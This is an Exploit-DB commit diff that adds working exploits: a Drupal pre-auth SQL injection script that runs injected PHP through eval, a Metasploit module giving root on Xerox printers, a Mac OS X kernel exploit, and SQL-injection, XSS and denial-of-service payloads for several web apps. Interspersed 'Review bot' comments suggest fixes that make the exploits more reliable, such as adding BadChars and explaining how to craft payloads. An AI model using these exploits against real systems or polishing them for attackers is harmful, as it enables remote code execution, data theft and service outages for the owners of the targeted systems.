Updated 11_05_2014

This commit is contained in:
Offensive Security 2014-11-05 04:45:14 +00:00
parent 79ad0e1a38
commit 9fc5498a7e
9 changed files with 346 additions and 0 deletions


@ -31660,3 +31660,11 @@ id,file,description,date,author,platform,type,port
35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 'range' Parameter SQL Injection Vulnerability",2010-12-27,Dr.NeT,php,webapps,0
35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal Vulnerability",2010-12-24,anonymous,linux,remote,0
35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 'Track' Module 'server.php' Cross Site Scripting Vulnerability",2010-12-27,"Ulisses Castro",php,webapps,0
35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443
35151,platforms/hardware/remote/35151.rb,"Xerox Multifunction Printers (MFP) ""Patch"" DLM Vulnerability",2014-11-03,metasploit,hardware,remote,9100
35153,platforms/osx/dos/35153.c,"Mac OS X Mavericks IOBluetoothHCIUserClient Privilege Escalation",2014-11-03,"rpaleari and joystick",osx,dos,0
35154,platforms/asp/webapps/35154.txt,"Sigma Portal 'ShowObjectPicture.aspx' Denial of Service Vulnerability",2010-12-27,"Pouya Daneshmand",asp,webapps,0
35155,platforms/php/webapps/35155.txt,"CruxCMS 3.0 Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,php,webapps,0
35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 help.php Multiple Parameter XSS",2010-12-28,waraxe,php,webapps,0
35157,platforms/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 searchnew.php picfile_* Parameter XSS",2010-12-28,waraxe,php,webapps,0
35158,platforms/windows/dos/35158.py,"Mongoose 2.11 'Content-Length' HTTP Header Remote Denial Of Service Vulnerability",2010-12-27,JohnLeitch,windows,dos,0
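
Review bot: the files.csv hunk adds 11 rows (35145, 35148, 35149, 35150, 35151, 35153, 35154, 35155, 35156, 35157, 35158) while the commit summary says 9 changed files, i.e. the CSV plus 8 exploit files, and no file for 35145, 35148 or 35149 appears in this commit; confirm those three paths already exist in the tree, otherwise the index points at missing files. Also, row 35153 is typed `dos` while its title reads "Privilege Escalation"; the shipped 35153.c has an empty payload() stub, so as committed it is a crash PoC, and either the type or the title should say which is meant.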



@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/45588/info
Sigma Portal is prone to a denial-of-service vulnerability.
Attackers can exploit this issue to cause the server to consume excessive resources, denying service to legitimate users.
http://www.example.com/Portal/Picture/ShowObjectPicture.aspx?Width=%27910000&Height=1099000-=&ObjectType=News&ObjectID=(Picture ID)
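
Review bot: the single request on the last line documents neither which parameter causes the resource exhaustion nor what a successful hit looks like; Width=%27910000 (a URL-encoded single quote followed by a very large value) and Height=1099000-= read like raw probe input, so one sentence stating which of the two values matters, and how to confirm the effect (response time, worker exhaustion), would make the PoC usable. The (Picture ID) placeholder is also embedded unmarked in the URL and must be replaced before sending. The rendered page shows this hunk without a file header; by the files.csv row it is platforms/asp/webapps/35154.txt.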


@ -0,0 +1,98 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Xerox Multifunction Printers (MFP) "Patch" DLM Vulnerability',
'Description' => %{
This module exploits a vulnerability found in Xerox Multifunction Printers (MFP). By
supplying a modified Dynamic Loadable Module (DLM), it is possible to execute arbitrary
commands under root priviages.
},
'Author' =>
[
'Deral "Percentx" Heiland',
'Pete "Bokojan" Arzamendi'
],
'References' =>
[
['BID', '52483'],
['URL', 'http://www.xerox.com/download/security/security-bulletin/1284332-2ddc5-4baa79b70ac40/cert_XRX12-003_v1.1.pdf'],
['URL', 'http://foofus.net/goons/percx/Xerox_hack.pdf']
],
'Privileged' => true,
'License' => MSF_LICENSE,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic bash-tcp'
}
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' => [['Automatic', {}]],
'DisclosureDate' => 'Mar 07 2012',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(9100)
], self.class)
end
def exploit
print_status("#{rhost}:#{rport} - Sending print job...")
firmcode = '%%XRXbegin' + "\x0A"
firmcode << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "\x0A"
firmcode << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "\x0A"
firmcode << '%%OID_ATT_JOB_COMMENT "PraedaPWN2014:' + "#{payload.encoded}" + ':"' + "\x0A"
firmcode << '%%OID_ATT_JOB_COMMENT "patch"' + "\x0A"
firmcode << '%%OID_ATT_DLM_NAME "xerox"' + "\x0A"
firmcode << '%%OID_ATT_DLM_VERSION "NO_DLM_VERSION_CHECK"' + "\x0A"
firmcode << '%%OID_ATT_DLM_SIGNATURE "ca361047da56db9dd81fee6a23ff875facc3df0e1153d325c2d217c0e75f861b"' + "\x0A"
firmcode << '%%OID_ATT_DLM_EXTRACTION_CRITERIA "extract /tmp/xerox.dnld"' + "\x0A"
firmcode << '%%XRXend' + "\x0A\x1F\x8B\x08\x00\xB1\x8B\x49\x54\x00\x03\xED"
firmcode << "\xD3\x41\x4B\xC3\x30\x14\x07\xF0\x9E\xFB\x29\xFE\xE2\x60\x20\x74"
firmcode << "\x69\x63\x37\x61\x5A\xBC\x79\x94\xDD\x3C\xC8\xA0\x59\x9B\xDA\x4A"
firmcode << "\xD7\xCC\xB4\xD3\x1D\xF6\xE1\x8D\xDD\x64\xB8\x83\x3B\x0D\x11\xFE"
firmcode << "\xBF\x43\x03\xAF\x2F\xEF\xBD\xB4\x64\xA3\xAD\xD9\x8C\xDA\xD2\x3B"
firmcode << "\xA3\xD0\xB9\x19\x8F\xFB\xD5\x39\x5E\xC3\x58\x4E\xBC\x48\xC6\x52"
firmcode << "\x5E\x87\xE3\x89\x8C\xBD\x30\x8A\xE4\x44\x7A\x08\xCF\x39\xD4\xB7"
firmcode << "\x75\xDB\x29\x0B\x78\xD6\x98\xEE\xB7\xBC\x53\xEF\xFF\xA9\xCB\x0B"
firmcode << "\xB1\xA8\x1A\xB1\x50\x6D\xE9\x17\x55\x9D\xA4\x2F\x56\xAF\x10\xD4"
firmcode << "\x08\x1E\x30\x9C\x59\xA5\x73\x35\x7B\x7A\x94\x61\x14\x0F\x21\xDE"
firmcode << "\x95\x15\xED\xCA\x98\x5A\x34\x99\x68\x74\x27\x5E\xCD\x62\x7A\x35"
firmcode << "\x8A\x52\xBF\x2A\xF0\x8C\xA0\xC0\xC0\xD5\xC0\xDC\xEF\x4A\xDD\xF8"
firmcode << "\xC0\x47\x59\xD5\x1A\x56\xAB\x1C\x75\xD5\x68\x17\xC9\x8D\x7B\x00"
firmcode << "\x3A\x2B\x0D\x06\x5F\x31\x6C\xB1\xEB\xF8\x06\xFC\x68\xD7\xE7\xF5"
firmcode << "\x65\x07\xF7\x48\x12\x84\x98\xDF\x62\x5F\x17\xC8\xCC\x72\xA9\x9A"
firmcode << "\x3C\x49\x0F\x95\xB6\xD9\xBA\x43\x90\x4F\xDD\x18\x32\xED\x93\x8A"
firmcode << "\xAA\xEF\xE8\x9A\xDC\xF5\x83\xF9\xBB\xE4\xFD\xDE\xED\xE1\xE0\x76"
firmcode << "\x89\x91\xD8\xEC\x6F\x82\xFB\x0C\xFE\x5F\xFF\x15\x22\x22\x22\x22"
firmcode << "\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\xA2\xD3\x3E"
firmcode << "\x01\x5A\x18\x54\xBB\x00\x28\x00\x00"
begin
connect
sock.put(firmcode)
handler
rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse => e
print_error("#{rhost}:#{rport} - #{e.message}")
ensure
disconnect
end
end
end
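
Review bot: the payload is spliced into a quoted, newline-terminated header at `firmcode << '%%OID_ATT_JOB_COMMENT "PraedaPWN2014:' + "#{payload.encoded}" + ':"' + "\x0A"` but the 'Payload' hash declares only 'Space' => 512 and no 'BadChars'; a cmd payload containing `"` or `\n` would close the comment early and corrupt the job header, so add 'BadChars' => "\x0a\x22" next to 'Space'. The gzip blob appended after `%%XRXend` (starting \x1F\x8B\x08) and the fixed OID_ATT_DLM_SIGNATURE value are undocumented; a comment stating what the archive contains and how it was produced would let maintainers regenerate it when the payload marker or extraction path changes. Typo in the Description: "priviages" should be "privileges".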

platforms/osx/dos/35153.c Executable file

@ -0,0 +1,92 @@
/*
* pwn.c, by @rpaleari and @joystick
*
* This PoC exploits a missing sign check in
* IOBluetoothHCIUserClient::SimpleDispatchWL().
*
* Tested on Mac OS X Mavericks (10.9.4/10.9.5).
*
* Compile with: gcc -Wall -o pwn{,.c} -framework IOKit
*
*/
#include <stdio.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
#include <IOKit/IOKitLib.h>
uint64_t payload() {
/* Your payload goes here. */
}
int main(void) {
/* Map our landing page (kernel will jump at tgt+7) */
vm_address_t tgt = 0x0000048800000000;
vm_allocate(mach_task_self(), &tgt, 0x1000, 0);
vm_protect(mach_task_self(), tgt, 0x1000, 0,
VM_PROT_READ|VM_PROT_WRITE|VM_PROT_EXECUTE);
memset((void *)tgt, 0, 0x1000);
/* Prepare payload */
char *target = (char *)tgt;
/* mov rax, payload */
target[7] = 0x48;
target[8] = 0xb8;
*((uint64_t *)(&target[9])) = (uint64_t) payload;
/* jmp rax */
target[17] = 0xff;
target[18] = 0xe0;
printf(" [+] Payload function @ %016llx\n", (uint64_t) payload);
printf(" [+] Stored trampoline @ %016llx\n", (uint64_t) tgt+7);
/* Find the vulnerable service */
io_service_t service =
IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("IOBluetoothHCIController"));
if (!service) {
return -1;
}
/* Connect to the vulnerable service */
io_connect_t port = (io_connect_t) 0;
kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
IOObjectRelease(service);
if (kr != kIOReturnSuccess) {
return kr;
}
printf(" [+] Opened connection to service on port: %d\n", port);
/* The first 8 bytes must be 0, so we don't have to handle following
parameters */
char a[] = "\x00\x00\x00\x00\x00\x00\x00\x00"
/* Don't really matter for the exploit (ignored due to the 0s above) */
"\x00\x00\x00\x00\x00\x00\x00\x07\x02\x00\x00\x00\x11\x0a\x00\x00\x03\x72\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\xe8\xfa\x2a\x54\xff\x7f\x00\x00\x78\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xa8\xfb\x2a\x54\xff\x7f\x00\x00\xd8\xfa\x2a\x54\xff\x7f\x00\x00\x60\x4a\xb6\x86"
"\x80\xff\xff\xff"
/* Index value 0xfff5b6a8 makes _sRoutines[index] point to an in-kernel
memory area that contains {0x0000048800000007, N}, with 0 <= N < 8. May
need to be adjusted on other Mavericks versions. */
"\xa8\xb6\xf5\xff\x80\xff\xff\xff";
printf(" [+] Launching exploit!\n");
kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
(uint32_t) 0, /* Selector */
NULL, 0, /* input, inputCnt */
(const void*) a, /* inputStruct */
sizeof(a), /* inputStructCnt */
NULL, NULL, NULL, NULL); /* Output stuff */
/* Exec shell here after payload returns */
return IOServiceClose(port);
}
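
Review bot: the return values of vm_allocate() and vm_protect() at the top of main() are not checked; the landing page is requested at the fixed address 0x0000048800000000 (flags 0, i.e. a fixed mapping), and if that mapping fails the following memset() and the trampoline writes fault in userland before the kernel is ever reached, which would be misread as the bug not triggering. Also, payload() is declared as returning uint64_t but has no return statement, so `gcc -Wall` as given in the header comment will warn, and kr from IOConnectCallMethod() is never inspected; printing it would help when the hard-coded index 0xfff5b6a8 and the 0xffffff8086b64a60 pointer need adjusting on another Mavericks build, as the comment in the hunk itself anticipates.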

platforms/php/webapps/35150.php Executable file

@ -0,0 +1,86 @@
<?php
// _____ __ __ _ _______
// / ___/___ / /__/ /_(_)___ ____ / ____(_)___ _____
// \__ \/ _ \/ //_/ __/ / __ \/ __ \/ __/ / / __ \/ ___/
// ___/ / __/ ,< / /_/ / /_/ / / / / /___/ / / / (__ )
// /____/\___/_/|_|\__/_/\____/_/ /_/_____/_/_/ /_/____/
// Poc for Drupal Pre Auth SQL Injection - (c) 2014 SektionEins
//
// created by Stefan Horst <stefan.horst@sektioneins.de>
// and Stefan Esser <stefan.esser@sektioneins.de>
//·
include 'common.inc';
include 'password.inc';
// set values
$user_id = 0;
$user_name = '';
$code_inject = 'phpinfo();session_destroy();die("");';
$url = isset($argv[1])?$argv[1]:'';
$code = isset($argv[2])?$argv[2]:'';
if ($url == '-h') {
echo "usage:\n";
echo $argv[0].' $url [$code|$file]'."\n";
die();
}
if (empty($url) || strpos($url,'https') === False) {
echo "please state the cookie url. It works only with https urls.\n";
die();
}
if (!empty($code)) {
if (is_file($code)) {
$code_inject = str_replace('<'.'?','',str_replace('<'.'?php','',str_replace('?'.'>','',file_get_contents($code))));
} else {
$code_inject = $code;
}
}
$code_inject = rtrim($code_inject,';');
$code_inject .= ';session_destroy();die("");';
if (strpos($url, 'www.') === 0) {
$url = substr($url, 4);
}
$_SESSION= array('a'=>'eval(base64_decode("'.base64_encode($code_inject).'"))','build_info' => array(), 'wrapper_callback' => 'form_execute_handlers', '#Array' => array('array_filter'), 'string' => 'assert');
$_SESSION['build_info']['args'][0] = &$_SESSION['string'];
list( , $session_name) = explode('://', $url, 2);
// use insecure cookie with sql inj.
$cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32);
$password = user_hash_password('test');
$session_id = drupal_random_key();
$sec_ssid = drupal_random_key();
$serial = str_replace('}','CURLYCLOSE',str_replace('{','CURLYOPEN',"batch_form_state|".serialize($_SESSION)));
$inject = "UNION SELECT $user_id,'$user_name','$password','','','',null,0,0,0,1,null,'',0,'',null,$user_id,'$session_id','','127.0.0.1',0,0,REPLACE(REPLACE('".$serial."','CURLYCLOSE',CHAR(".ord('}').")),'CURLYOPEN',CHAR(".ord('{').")) -- ";
$cookie = $cookieName.'[test+'.urlencode($inject).']='.$session_id.'; '.$cookieName.'[test]='.$session_id.'; S'.$cookieName.'='.$sec_ssid;
$ch = curl_init($url);
curl_setopt($ch,CURLOPT_HEADER,True);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,True);
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,False);
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0');
curl_setopt($ch,CURLOPT_HTTPHEADER,array(
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language: en-US,en;q=0.5'
));
curl_setopt($ch,CURLOPT_COOKIE,$cookie);
$output = curl_exec($ch);
curl_close($ch);
echo $output;
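
Review bot: the `strpos($url, 'www.') === 0` branch is unreachable: by that point $url has already been required to contain 'https', so it begins with the scheme and never with 'www.'; if the intent is to mirror how the target derives its session name, apply the check to $session_name after the explode('://', $url, 2), or drop it. The preceding check `strpos($url,'https') === False` also accepts any URL that merely contains the substring 'https' somewhere; `strpos($url, 'https://') !== 0` matches the stated "works only with https urls" requirement. Finally, `include 'common.inc'` and `include 'password.inc'` supply user_hash_password() and drupal_random_key() without saying that these are Drupal's own includes/ files to be copied beside the script, or which further includes they pull in; a usage comment next to the -h text would save the next user a fatal error.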

platforms/php/webapps/35155.txt Executable file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/45594/info
CruxCMS is prone to multiple input-validation vulnerabilities, including multiple security-bypass issues, multiple arbitrary-file-upload issues, multiple SQL-injection issues, a local file-include issue, a cross-site-scripting issue and multiple information-disclosure issues. These issues occur because the application fails to properly sanitize user-supplied input.
Exploiting these issues may allow an unauthorized user to view files and execute local scripts, execute arbitrary script code, bypass certain security restrictions, access or modify data, exploit latent vulnerabilities in the underlying database, gain administrative access, steal cookie-based authentication credentials, and launch other attacks.
CruxCMS 3.0.0 is vulnerable; other versions may also be affected.
http://www.example.com/cruxcms.3.0.0/search.php?search=_&max=1+UNION+ALL+SELECT+1,CONCAT_WS(0x3a,Id,Name,Password,Email,Admin),1,1+FROM+cruxcms_users
http://www.example.com/cruxcms.3.0.0/links.php?max=1+UNION+ALL+SELECT+1,1,CONCAT_WS(0x3a,Id,Name,Password,Email,Admin),1,0x596573+FROM+cruxcms_users
http://www.example.com/cruxcms.3.0.0/includes/template.php?style=../white.gif
http://www.example.com/cruxcms.3.0.0/manager/login.php?message=<script>alert(123);</script>
http://www.example.com/cruxcms.3.0.0/manager/switcher.php?style[]
http://www.example.com/cruxcms.3.0.0/search.php?search[]
http://www.example.com/cruxcms.3.0.0/manager/filetypes.php
http://www.example.com/cruxcms.3.0.0/styles/andreas01.php
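
Review bot: the eight request lines are not labelled by issue class, while the description above enumerates security-bypass, arbitrary-file-upload, SQL-injection, local-file-include, cross-site-scripting and information-disclosure issues; a reader can match search.php and links.php (UNION ALL SELECT ... FROM cruxcms_users) to SQL injection, includes/template.php?style=../white.gif to the file include, manager/login.php?message=<script> to XSS and the bare switcher.php?style[], search.php?search[], manager/filetypes.php and styles/andreas01.php requests to information disclosure, but nothing in the hunk demonstrates the arbitrary-file-upload or security-bypass issues the text claims. Either add requests for those or narrow the description to what the PoC shows, and put a one-word label in front of each line.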

platforms/php/webapps/35156.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/45600/info
Coppermine Photo Gallery is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Coppermine Photo Gallery 1.5.10 is vulnerable; other versions may also be affected.
http://www.example.com/cpg.1.5.10/help.php?base=1
&h=czozMzoiPHNjcmlwdD5hbGVydCgnaGVhZGVyJyk7PC9zY3JpcHQ%2bIjs
&t=czozMToiPHNjcmlwdD5hbGVydCgndGV4dCcpOzwvc2NyaXB0PiI7
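
Review bot: the PoC request is broken across three lines (`help.php?base=1`, then `&h=...`, then `&t=...`) and must be rejoined into one URL before use; a note saying so, or a single line, would avoid a malformed request. The hunk also leaves the h and t values unexplained: they are base64 of PHP serialize()d strings (h decodes to s:33:"<script>alert('header');</script>"; and t to s:31:"<script>alert('text');</script>";), with the `+` in h URL-encoded as %2b. Stating that tells a reader how to build their own payload and why the length prefix has to match the string.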


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45600/info
Coppermine Photo Gallery is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Coppermine Photo Gallery 1.5.10 is vulnerable; other versions may also be affected.
<html><body><center> <form action="http://localhost/cpg.1.5.10/searchnew.php" method="post"> <input type="hidden" name="insert" value="1"> <input type="hidden" name="pics[]" value="222"> <input type="hidden" name="picfile_222" value="PGJvZHkgb25sb2FkPWFsZXJ0KDEyMyk7Pg"> <input type="submit" value="Test!"> </form> </center></body></html>
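
Review bot: the whole form is on one line and the hidden picfile_222 value is left unexplained; it is base64 of `<body onload=alert(123);>`, and the field name is tied to the pics[] value (pics[]=222 pairs with picfile_222), which is what the title's "picfile_* Parameter" refers to. Spelling this out, and breaking the HTML onto one element per line, would make the PoC readable and adaptable to another picture id. The action is hard-coded to http://localhost/cpg.1.5.10/searchnew.php, which is fine for a PoC but worth stating. The rendered page shows this hunk without its file header; by the files.csv row it is platforms/php/webapps/35157.html.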

platforms/windows/dos/35158.py Executable file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/45602/info
Mongoose is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted input.
Successfully exploiting this issue will allow an attacker to crash the affected application, denying further service to legitimate users.
Mongoose 2.11 is vulnerable; other versions may also be affected.
import socket
host = 'localhost'
port = 8080
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(8)
s.connect((host, port))
s.send('GET / HTTP/1.1\r\n'
'Host: ' + host + '\r\n'
'Content-Length: -2147483648\r\n\r\n')
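
Review bot: the file is a .py but its first four lines (the source: line, the two description sentences and the version line) are not commented out, so `python 35158.py` fails with a SyntaxError before the socket code runs; prefix them with `#` or move them into a docstring. The hunk header announces 19 added lines while the rendered page stops after the s.send(...) call, so the tail of the script is not visible here and should be checked in the raw file. The str-based s.send() is Python 2 only; on Python 3 the request must be bytes. The Content-Length value -2147483648 is the minimum 32-bit signed integer, which is the crafted input the description refers to and is worth saying in a comment.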